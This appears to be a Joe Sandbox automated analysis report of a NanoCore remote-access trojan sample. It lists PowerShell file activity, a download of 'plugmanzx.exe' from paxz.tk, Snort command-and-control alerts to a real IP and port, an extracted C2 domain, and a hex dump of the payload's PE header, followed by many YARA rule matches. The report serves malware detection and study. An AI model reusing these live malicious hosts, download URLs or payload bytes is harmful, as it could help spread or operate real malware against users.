      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690772132.0000000000AB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692471982.0000000003999000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690866803.0000000000B70000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 2.58.149.41:80
      Source: global trafficDNS query: name: paxz.tk
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 2.58.149.41:80

      Networking

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49166 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49167 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49168 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49169 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 103.153.78.234:3132
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 103.153.78.234:3132
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: vijayikohli1.bounceme.net
      Source: Malware configuration extractorURLs: 127.0.0.1
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 24 Jan 2022 14:31:19 GMTServer: ApacheLast-Modified: Mon, 24 Jan 2022 10:15:50 GMTETag: "73800-5d65140bd6d4a"Accept-Ranges: bytesContent-Length: 473088Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 07 7b ee 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 2c 07 00 00 0a 00 00 00 00 00 00 8e 4a 07 00 00 20 00 00 00 60 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 4a 07 00 4f 00 00 00 00 60 07 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 2a 07 00 00 20 00 00 00 2c 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 06 00 00 00 60 07 00 00 08 00 00 00 2e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 07 00 00 02 00 00 00 36 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 4a 07 00 00 00 00 00 48 00 00 00 02 00 05 00 60 b5 06 00 dc 94 00 00 03 00 00 00 30 01 00 06 28 f4 00 00 38 c1 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 0e 00 00 00 12 00 00 00 13 00 00 00 02 00 00 00 0e 00 00 00 11 00 00 00 13 00 00 00 13 30 02 00 01 00 00 00 01 00 00 11 2a 00 00 00 13 30 03 00 07 00 00 00 01 00 00 11 02 7b 0c 00 00 04 2a 00 13 30 04 00 08 00 00 00 01 00 00 11 02 03 7d 0c 00 00 04 2a 13 30 03 00 4e 00 00 00 02 00 00 11 00 20 3d a8 47 f7 20 1b ea ff b9 61 25 0b 1a 5e 45 04 00 00 00 27 00 00 00 18 00 00 00 02 00 00 00 dc ff ff ff 2b 25 02 7b 05 00 00 04 0a 07 20 db 2a cb 8e 5a 20 08 c0 84 ef 61 2b c9 07 20 10 a0 54 ba 5a 20 8f 9e c1 02 61 2b ba 06 2a 00 00 13 30 03 00 3b 00 00 00 02 00 00 11 00 20 54 51 73 d5 20 63 5d 69 db 61 25 0b 19 5e 45 03 00 00 00 e0 ff ff ff 18 00 00 00 02 00 00 00 2b 16 02 7b 0d 00 00 04 0a 07 20 76 01 5f ad 5a 20 77 c1 cc c3 61 2b cd 06 2a 00 13 30 04 00 09 00 00 00 01 00 00 11 00 02 03 7d 0d 00 00 04 2a 00 00 00 13 30 03 00 3b 00 00 00 03 00 00 11 00 02 7b 0a 00 00 04 0a 20 20 9d ef 9f 20 9a 47 4a 91 61 25 0b
      Source: global trafficHTTP traffic detected: GET /plugmanzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paxz.tkConnection: Keep-Alive
      Source: Joe Sandbox ViewASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK
      Source: Joe Sandbox ViewASN Name: GBTCLOUDUS GBTCLOUDUS
      Source: Joe Sandbox ViewIP Address: 2.58.149.41 2.58.149.41
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 103.153.78.234:3132
      Source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://google.com
      Source: plugmancdht5461.exe, 00000004.00000002.433210954.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, plugmancdht5461.exe, 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EA9EF1E3-15A6-45BA-9A80-F6F38BA9CAD0}.tmpJump to behavior
      Source: unknownDNS traffic detected: queries for: paxz.tk
      Source: global trafficHTTP traffic detected: GET /plugmanzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paxz.tkConnection: Keep-Alive
      Source: RegSvcs.exeBinary or memory string: RegisterRawInputDevices

      E-Banking Fraud

      barindex
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a4629.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.364b35e.19.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a0000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.3650194.17.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a0000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36dbcc8.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36a90a8.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.36547bd.18.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.3650194.17.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36a90a8.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36dbcc8.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: plugmancdht5461.exe PID: 848, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 788, type: MEMORYSTR

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 9.2.RegSvcs.exe.d90000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.5f0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.4610000.30.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.b50000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.b50000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.4610000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.a90000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.5a4629.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.364b35e.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.364b35e.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.5a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.ab0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.39a632e.24.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.4600000.29.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.48fe8a4.34.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.3a12e3f.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.3a12e3f.28.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.b80000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.3a2a09e.27.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.261c894.13.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.d90000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.4850000.31.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.3650194.17.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.a90000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.d80000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.b70000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.48f0000.32.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.269d93c.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.269d93c.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.5f0000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.37263cf.20.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.39a632e.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.4600000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.37263cf.20.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.399d4ff.25.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.b70000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.3a1bc6e.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.3a2a09e.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.590000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.5a0000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.3840482.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.3840482.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.382be55.21.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.d80000.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.48f4c9f.33.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.381fc21.22.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.2689300.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.4850000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.3a1bc6e.26.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.399d4ff.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.399d4ff.25.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.3a12e3f.28.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.267d0b8.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.plugmancdht5461.exe.36dbcc8.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.plugmancdht5461.exe.36dbcc8.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.48f0000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.plugmancdht5461.exe.36a90a8.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.plugmancdht5461.exe.36a90a8.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.36547bd.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.3650194.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.382be55.21.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.382be55.21.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.267d0b8.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.267d0b8.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.2689300.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.2689300.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.RegSvcs.exe.381fc21.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.RegSvcs.exe.381fc21.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.2.plugmancdht5461.exe.36a90a8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.plugmancdht5461.exe.36a90a8.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.2.plugmancdht5461.exe.36dbcc8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.plugmancdht5461.exe.36dbcc8.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.690772132.0000000000AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.690866803.0000000000B70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.692471982.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.692715551.0000000004600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.690835974.0000000000B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.690874360.0000000000B80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.690920754.0000000000D90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.692864773.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
